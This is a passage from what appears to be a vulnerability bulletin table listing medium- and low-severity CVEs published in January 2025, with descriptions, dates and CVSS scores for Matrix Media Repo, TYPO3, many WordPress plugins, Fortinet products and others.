Matrix Media Repo (MMR) is a highly configurable multi-homeserver media repository for Matrix. MMR before version 1.3.5 allows, by design, unauthenticated remote participants to trigger a download and caching of remote media from a remote homeserver to the local media repository. Such content then also becomes available for download from the local homeserver in an unauthenticated way. The implication is that unauthenticated remote adversaries can use this functionality to plant problematic content into the media repository. MMR 1.3.5 introduces a partial mitigation in the form of new endpoints which require authentication for media downloads. The unauthenticated endpoints will be frozen in a future release, closing the attack vector. Though extremely limited, server operators can use more strict rate limits based on IP address as a partial workaround. | 2025-01-16 | 5.3 | CVE-2024-36402 |
| t2bot--matrix-media-repo |
Matrix Media Repo (MMR) is a highly configurable multi-homeserver media repository for Matrix. MMR before version 1.3.5 is vulnerable to unbounded disk consumption, where an unauthenticated adversary can induce it to download and cache large amounts of remote media files. MMR's typical operating environment uses S3-like storage as a backend, with file-backed store as an alternative option. Instances using a file-backed store or those which self-host an S3 storage system are therefore vulnerable to a disk fill attack. Once the disk is full, authenticated users will be unable to upload new media, resulting in denial of service. For instances configured to use a cloud-based S3 storage option, this could result in high service fees instead of a denial of service. MMR 1.3.5 introduces a new default-on "leaky bucket" rate limit to reduce the amount of data a user can request at a time. This does not fully address the issue, but does limit an unauthenticated user's ability to request large amounts of data. Operators should note that the leaky bucket implementation introduced in MMR 1.3.5 requires the IP address associated with the request to be forwarded, to avoid mistakenly applying the rate limit to the reverse proxy instead. To avoid this issue, the reverse proxy should populate the X-Forwarded-For header when sending the request to MMR. Operators who cannot update may wish to lower the maximum file size they allow and implement harsh rate limits, though this can still lead to a large amount of data to be downloaded. | 2025-01-16 | 5.3 | CVE-2024-36403 |
| t2bot--matrix-media-repo |
Matrix Media Repo (MMR) is a highly configurable multi-homeserver media repository for Matrix. Matrix Media Repo (MMR) is vulnerable to server-side request forgery, serving content from a private network it can access, under certain conditions. This is fixed in MMR v1.3.8. Users are advised to upgrade. Restricting which hosts MMR is allowed to contact via (local) firewall rules or a transparent proxy and may provide a workaround for users unable to upgrade. | 2025-01-16 | 5 | CVE-2024-52602 |
| t2bot--matrix-media-repo |
Matrix Media Repo (MMR) is a highly configurable multi-homeserver media repository for Matrix. MMR makes requests to other servers as part of normal operation, and these resource owners can return large amounts of JSON back to MMR for parsing. In parsing, MMR can consume large amounts of memory and exhaust available memory. This is fixed in MMR v1.3.8. Users are advised to upgrade. For users unable to upgrade; forward proxies can be configured to block requests to unsafe hosts. Alternatively, MMR processes can be configured with memory limits and auto-restart. Running multiple MMR processes concurrently can help ensure a restart does not overly impact users. | 2025-01-16 | 5.3 | CVE-2024-52791 |
| TC--Ajax WP Query Search Filter |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TC Ajax WP Query Search Filter allows Stored XSS.This issue affects Ajax WP Query Search Filter: from n/a through 1.0.7. | 2025-01-16 | 6.5 | CVE-2025-23926 |
| TDuckCloud--tduck-platform |
A vulnerability classified as critical was found in TDuckCloud tduck-platform up to 4.0. This vulnerability affects the function QueryProThemeRequest of the file src/main/java/com/tduck/cloud/form/request/QueryProThemeRequest.java. The manipulation of the argument color leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-18 | 6.3 | CVE-2025-0558 |
| TechnoWich--WP ULike |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TechnoWich WP ULike allows Stored XSS.This issue affects WP ULike: from n/a through 4.7.6. | 2025-01-15 | 5.9 | CVE-2025-22738 |
| theverylastperson--Car Demon |
The Car Demon plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search_condition' parameter in all versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-15 | 6.1 | CVE-2024-13334 |
| thimpress--WP Hotel Booking |
The WP Hotel Booking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check when adding rooms in all versions up to, and including, 2.1.5. This makes it possible for unauthenticated attackers to add rooms with custom prices. | 2025-01-17 | 5.3 | CVE-2024-12370 |
| Thomas Ehrhardt--Powie's pLinks PagePeeker |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Thomas Ehrhardt Powie's pLinks PagePeeker allows DOM-Based XSS.This issue affects Powie's pLinks PagePeeker: from n/a through 1.0.2. | 2025-01-16 | 6.5 | CVE-2025-23641 |
| Thorn Technologies LLC--Cache Sniper for Nginx |
Missing Authorization vulnerability in Thorn Technologies LLC Cache Sniper for Nginx allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cache Sniper for Nginx: from n/a through 1.0.4.2. | 2025-01-16 | 4.3 | CVE-2025-23776 |
| tobig--quote-posttype-plugin |
The quote-posttype-plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Author field in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-17 | 6.4 | CVE-2024-13386 |
| Tom Ewer and Tito Pandu--Easy Tweet Embed |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tom Ewer and Tito Pandu Easy Tweet Embed allows DOM-Based XSS.This issue affects Easy Tweet Embed: from n/a through 1.7. | 2025-01-16 | 6.5 | CVE-2025-23890 |
| Tor Morten Jensen--Foundation Columns |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tor Morten Jensen Foundation Columns allows Stored XSS.This issue affects Foundation Columns: from n/a through 0.8. | 2025-01-15 | 6.5 | CVE-2025-22747 |
| Tushar Patel--Easy Portfolio |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tushar Patel Easy Portfolio allows Stored XSS.This issue affects Easy Portfolio: from n/a through 1.3. | 2025-01-16 | 6.5 | CVE-2025-23796 |
| TYPO3--typo3 |
TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none The vulnerability in the affected downstream component "Form Framework Module" allows attackers to manipulate or delete persisted form definitions. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described. There are no known workarounds for this vulnerability. | 2025-01-14 | 5.4 | CVE-2024-55922 |
| TYPO3--typo3 |
TYPO3 is a free and open source Content Management Framework. Applications that use `TYPO3\CMS\Core\Http\Uri` to parse externally provided URLs (e.g., via a query parameter) and validate the host of the parsed URL may be vulnerable to open redirect or SSRF attacks if the URL is used after passing the validation checks. Users are advised to update to TYPO3 versions 9.5.49 ELTS, 10.4.48 ELTS, 11.5.42 LTS, 12.4.25 LTS, 13.4.3 which fix the problem described. There are no known workarounds for this vulnerability. | 2025-01-14 | 4.8 | CVE-2024-55892 |
| TYPO3--typo3 |
TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component "Log Module" allows attackers to remove log entries. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described. There are no known workarounds for this vulnerability. | 2025-01-14 | 4.3 | CVE-2024-55893 |
| TYPO3--typo3 |
TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component "Backend User Module" allows attackers to initiate password resets for other backend users or to terminate their user sessions. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described. | 2025-01-14 | 4.3 | CVE-2024-55894 |
| TYPO3--typo3 |
TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component "Dashboard Module" allows attackers to manipulate the victim's dashboard configuration. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described. There are no known workarounds for this vulnerability. | 2025-01-14 | 4.3 | CVE-2024-55920 |
| TYPO3--typo3 |
TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component "Indexed Search Module" allows attackers to delete items of the component. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described. There are no known workarounds for this issue. | 2025-01-14 | 4.3 | CVE-2024-55923 |
| TYPO3--typo3 |
TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to `lax` or `none`. The vulnerability in the affected downstream component "DB Check Module" allows attackers to manipulate data through unauthorized actions. Users are advised to update to TYPO3 versions 11.5.42 ELTS which fixes the problem described. There are no known workarounds for this issue. | 2025-01-14 | 4.3 | CVE-2024-55945 |
| Ugur CELIK--WP News Sliders |
Missing Authorization vulnerability in Ugur CELIK WP News Sliders allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP News Sliders: from n/a through 1.0. | 2025-01-15 | 4.3 | CVE-2025-22779 |
| Ujjaval Jani--Copy Move Posts |
Missing Authorization vulnerability in Ujjaval Jani Copy Move Posts allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Copy Move Posts: from n/a through 1.6. | 2025-01-16 | 5.3 | CVE-2025-23764 |
| ultimatemember--Ultimate Member User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin |
The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.9.1 through different error messages in the responses. This makes it possible for unauthenticated attackers to exfiltrate data from wp_usermeta table. | 2025-01-18 | 5.3 | CVE-2025-0318 |
| umbraco--Umbraco.Forms.Issues |
Umbraco.Forms is a web form framework written for the nuget ecosystem. Character limits configured by editors for short and long answer fields are validated only client-side, not server-side. This issue has been patched in versions 8.13.16, 10.5.7, 13.2.2, and 14.1.2. Users are advised to upgrade. There are no known workarounds for this issue. | 2025-01-14 | 5.8 | CVE-2025-23041 |
| Unknown--Email Subscribers by Icegram Express |
The Email Subscribers by Icegram Express WordPress plugin before 5.7.45 does not sanitise and escape some of its Text Block options, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2025-01-13 | 4.8 | CVE-2024-11636 |
| Unknown--Email Subscribers by Icegram Express |
The Email Subscribers by Icegram Express WordPress plugin before 5.7.45 does not sanitise and escape some of form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2025-01-13 | 4.8 | CVE-2024-12566 |
| Unknown--Email Subscribers by Icegram Express |
The Email Subscribers by Icegram Express WordPress plugin before 5.7.45 does not sanitise and escape some of its form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2025-01-13 | 4.8 | CVE-2024-12567 |
| Unknown--Email Subscribers by Icegram Express |
The Email Subscribers by Icegram Express WordPress plugin before 5.7.45 does not sanitise and escape some of its Workflow settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2025-01-13 | 4.8 | CVE-2024-12568 |
| vcita--Event Registration Calendar By vcita |
The Event Registration Calendar By vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-15 | 6.4 | CVE-2024-11870 |
| videowhisper--MicroPayments Fans Paysite: Paid Creator Subscriptions, Digital Assets, Tokens Wallet |
The MicroPayments - Fans Paysite: Paid Creator Subscriptions, Digital Assets, Tokens Wallet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_content_upload_guest' shortcode in all versions up to, and including, 2.9.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-18 | 6.4 | CVE-2024-13391 |
| videowhisper--Picture Gallery Frontend Image Uploads, AJAX Photo List |
The Picture Gallery - Frontend Image Uploads, AJAX Photo List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's videowhisper_picture_upload_guest shortcode in all versions up to, and including, 1.5.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-18 | 6.4 | CVE-2024-12696 |
| videowhisper--Rate Star Review Vote AJAX Reviews, Votes, Star Ratings |
The Rate Star Review Vote - AJAX Reviews, Votes, Star Ratings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_reviews' shortcode in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-18 | 6.4 | CVE-2024-13392 |
| videowhisper--Video Share VOD Turnkey Video Site Builder Script |
The Video Share VOD - Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_videos' shortcode in all versions up to, and including, 2.6.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-18 | 6.4 | CVE-2024-13393 |
| vim--vim |
When switching to other buffers using the :all command and visual mode still being active, this may cause a heap-buffer overflow, because Vim does not properly end visual mode and therefore may try to access beyond the end of a line in a buffer. In Patch 9.1.1003 Vim will correctly reset the visual mode before opening other windows and buffers and therefore fix this bug. In addition it does verify that it won't try to access a position if the position is greater than the corresponding buffer line. Impact is medium since the user must have switched on visual mode when executing the :all ex command. The Vim project would like to thank github user gandalf4a for reporting this issue. The issue has been fixed as of Vim patch v9.1.1003 | 2025-01-13 | 4.2 | CVE-2025-22134 |
| Vincent Loy--Yet Another Countdown |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vincent Loy Yet Another Countdown allows DOM-Based XSS.This issue affects Yet Another Countdown: from n/a through 1.0.1. | 2025-01-16 | 6.5 | CVE-2025-23891 |
| Virtual Computer--Vysual RH Solution |
A vulnerability classified as problematic was found in Virtual Computer Vysual RH Solution 2024.12.1. Affected by this vulnerability is an unknown functionality of the file /index.php of the component Login Panel. The manipulation of the argument page leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-14 | 4.3 | CVE-2025-0458 |
| W3speedster--W3SPEEDSTER |
Cross-Site Request Forgery (CSRF) vulnerability in W3speedster W3SPEEDSTER allows Cross Site Request Forgery.This issue affects W3SPEEDSTER: from n/a through 7.33. | 2025-01-16 | 4.3 | CVE-2025-23765 |
| Wavlink--Wavlink AC3000 |
An information disclosure vulnerability exists in the testsave.sh functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. | 2025-01-14 | 5.3 | CVE-2024-39773 |
| webtechstreet--Elementor Addon Elements |
The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.10 via the 'render' function in modules/modal-popup/widgets/modal-popup.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, scheduled, and draft template data. | 2025-01-15 | 4.3 | CVE-2024-13215 |
| webwizardsdev--MarketKing Ultimate WooCommerce Multivendor Marketplace Solution |
The MarketKing - Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin's settings in all versions up to, and including, 1.9.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-01-18 | 4.4 | CVE-2024-13519 |
| webzunft--Image Source Control Lite Show Image Credits and Captions |
The Image Source Control Lite - Show Image Credits and Captions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'path' parameter in all versions up to, and including, 2.28.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-18 | 6.1 | CVE-2024-13515 |
| Wikimedia Foundation--Mediawiki - DataTransfer Extension |
Cross-Site Request Forgery (CSRF), Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - DataTransfer Extension allows Cross Site Request Forgery, Cross-Site Scripting (XSS).This issue affects Mediawiki - DataTransfer Extension: from 1.39.X before 1.39.11, from 1.41.X before 1.41.3, from 1.42.X before 1.42.2. | 2025-01-14 | 6.1 | CVE-2025-23081 |
| Wikimedia Foundation--Mediawiki - OpenBadges Extension |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - OpenBadges Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - OpenBadges Extension: from 1.39.X before 1.39.11, from 1.41.X before 1.41.3, from 1.42.X before 1.42.2. | 2025-01-14 | 5.3 | CVE-2025-23080 |
| Willows Consulting Ltd.--GDPR Personal Data Reports |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Willows Consulting Ltd. GDPR Personal Data Reports allows Stored XSS.This issue affects GDPR Personal Data Reports: from n/a through 1.0.5. | 2025-01-16 | 6.5 | CVE-2025-23777 |
| wishfulthemes--Email Capture & Lead Generation |
Missing Authorization vulnerability in wishfulthemes Email Capture & Lead Generation allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Email Capture & Lead Generation: from n/a through 1.0.2. | 2025-01-16 | 4.3 | CVE-2025-23929 |
| WP Code Snippets (Luke America)--WCS QR Code Generator |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Code Snippets (Luke America) WCS QR Code Generator allows Stored XSS.This issue affects WCS QR Code Generator: from n/a through 1.0. | 2025-01-16 | 6.5 | CVE-2025-23864 |
| WP Tasker--WordPress Graphs & Charts |
Missing Authorization vulnerability in WP Tasker WordPress Graphs & Charts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Graphs & Charts: from n/a through 2.0.8. | 2025-01-16 | 5.4 | CVE-2025-23961 |
| WPChill--Htaccess File Editor |
Insertion of Sensitive Information into Externally-Accessible File or Directory vulnerability in WPChill Htaccess File Editor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Htaccess File Editor: from n/a through 1.0.19. | 2025-01-15 | 5.3 | CVE-2025-22773 |
| wpdevelop--WP Booking Calendar |
The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'booking' shortcode in all versions up to, and including, 10.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-14 | 6.4 | CVE-2024-13323 |
| wpeventmanager--WP User Profile Avatar |
The WP User Profile Avatar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.5. This is due to missing or incorrect nonce validation on the wpupa_user_admin() function. This makes it possible for unauthenticated attackers to update the plugins setting which controls access to the functionality via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-16 | 4.3 | CVE-2024-10789 |
| WpFreeware--WpF Ultimate Carousel |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WpFreeware WpF Ultimate Carousel allows Stored XSS.This issue affects WpF Ultimate Carousel: from n/a through 1.0.11. | 2025-01-16 | 6.5 | CVE-2025-23933 |
| wproyal--Royal Elementor Addons and Templates |
The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.1006. This is due to missing or incorrect nonce validation on the wpr_filter_grid_posts() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-14 | 6.1 | CVE-2025-0393 |
| WWP--GMAPS for WPBakery Page Builder Free |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WWP GMAPS for WPBakery Page Builder Free allows Stored XSS.This issue affects GMAPS for WPBakery Page Builder Free: from n/a through 1.2. | 2025-01-16 | 6.5 | CVE-2025-23775 |
| xola.com--Xola |
Missing Authorization vulnerability in xola.com Xola allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Xola: from n/a through 1.6. | 2025-01-16 | 4.3 | CVE-2025-23955 |
| YesStreaming.com Shoutcast and Icecast Internet Radio Hosting--Shoutcast and Icecast HTML5 Web Radio Player by YesStreaming.com |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in YesStreaming.com Shoutcast and Icecast Internet Radio Hosting Shoutcast and Icecast HTML5 Web Radio Player by YesStreaming.com allows Stored XSS.This issue affects Shoutcast and Icecast HTML5 Web Radio Player by YesStreaming.com: from n/a through 3.3. | 2025-01-16 | 5.9 | CVE-2025-23854 |
| yunra--Utilities for MTG |
The Utilities for MTG plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mtglink' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-18 | 6.4 | CVE-2024-13433 |
| zookatron--MyBookProgress by Stormhill Media |
The MyBookProgress by Stormhill Media plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'book' parameter in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-17 | 6.4 | CVE-2024-12598 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Apple--iOS and iPadOS |
This issue was addressed through improved state management. This issue is fixed in iOS 17.5 and iPadOS 17.5. An attacker with physical access to an iOS device may be able to view notification contents from the Lock Screen. | 2025-01-15 | 2.4 | CVE-2024-40839 |
| CampCodes--School Management Software |
A vulnerability, which was classified as problematic, was found in CampCodes School Management Software 1.0. Affected is an unknown function of the file /photo-gallery of the component Photo Gallery Page. The manipulation of the argument Description leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-18 | 2.4 | CVE-2025-0560 |
| Campcodes--School Management Software |
A vulnerability, which was classified as problematic, has been found in Campcodes School Management Software 1.0. This issue affects some unknown processing of the file /create-id-card of the component Create Id Card Page. The manipulation of the argument ID Card Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-18 | 2.4 | CVE-2025-0559 |
| code-projects--Car Rental Management System |
A vulnerability, which was classified as problematic, has been found in code-projects Car Rental Management System 1.0. This issue affects some unknown processing of the file /admin/manage-pages.php. The manipulation of the argument pgdetails leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 2.4 | CVE-2025-0537 |
| code-projects--Job Recruitment |
A vulnerability has been found in code-projects Job Recruitment 1.0 and classified as problematic. This vulnerability affects unknown code of the file /_parse/_feedback_system.php. The manipulation of the argument type leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 3.5 | CVE-2025-0530 |
| code-projects--Tourism Management System |
A vulnerability, which was classified as problematic, was found in code-projects Tourism Management System 1.0. Affected is an unknown function of the file /admin/manage-pages.php. The manipulation of the argument pgedetails leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 3.5 | CVE-2025-0538 |
| Fanli2012--native-php-cms |
A vulnerability has been found in Fanli2012 native-php-cms 1.0 and classified as problematic. This vulnerability affects unknown code of the file /fladmin/jump.php. The manipulation of the argument message/error leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 3.5 | CVE-2025-0483 |
| Fanli2012--native-php-cms |
A vulnerability was found in Fanli2012 native-php-cms 1.0. It has been classified as problematic. Affected is an unknown function of the file /fladmin/sysconfig_doedit.php. The manipulation of the argument info leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 3.5 | CVE-2025-0485 |
| Fortinet--FortiClientEMS |
An improper verification of source of a communication channel vulnerability [CWE-940] in FortiClientEMS 7.4.0, 7.2.0 through 7.2.4, 7.0 all versions, 6.4 all versions may allow a remote attacker to bypass the trusted host feature via session connection. | 2025-01-14 | 3.7 | CVE-2024-36506 |
| Fortinet--FortiClientWindows |
A use of hard-coded cryptographic key in Fortinet FortiClientWindows version 7.4.0, 7.2.x all versions, 7.0.x all versions, and 6.4.x all versions may allow a low-privileged user to decrypt interprocess communication via monitoring named piped. | 2025-01-14 | 3.3 | CVE-2024-50564 |
| Fortinet--FortiOS |
An insertion of sensitive information into sent data vulnerability [CWE-201] in FortiOS 7.6.0, 7.4.0 through 7.4.4 may allow an attacker in a man-in-the-middle position to retrieve the RADIUS accounting server shared secret via intercepting accounting-requests. | 2025-01-14 | 3.7 | CVE-2024-46665 |
| Fortinet--FortiOS |
An Integer Overflow or Wraparound vulnerability [CWE-190] in version 7.4.4 and below, version 7.2.10 and below; FortiSASE version 23.4.b FortiOS tenant IPsec IKE service may allow an authenticated attacker to crash the IPsec tunnel via crafted requests, resulting in potential denial of service. | 2025-01-14 | 3.5 | CVE-2024-46669 |
| Fortinet--FortiPortal |
An improper neutralization of script-related html tags in a web page (basic xss) in Fortinet FortiPortal 6.0.0 through 6.0.14 allows attacker to execute unauthorized code or commands via html injection. | 2025-01-14 | 3.5 | CVE-2024-52967 |
| Fortinet--FortiProxy |
A out-of-bounds write in Fortinet FortiOS versions 7.6.0, 7.4.0 through 7.4.6, 7.2.0 through 7.2.10, 7.0.0 through 7.0.16, 6.4.0 through 6.4.15 allows attacker to trigger a denial of service via specially crafted packets. | 2025-01-14 | 3.7 | CVE-2024-52963 |
| Fortinet--FortiWeb |
A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiWeb versions 6.3.17 through 7.6.1 allows attacker to gain information disclosure via crafted SQL queries | 2025-01-14 | 2.7 | CVE-2024-55593 |
| Microsoft--Windows 10 Version 1809 |
Windows Smart Card Reader Information Disclosure Vulnerability | 2025-01-14 | 2.4 | CVE-2025-21312 |
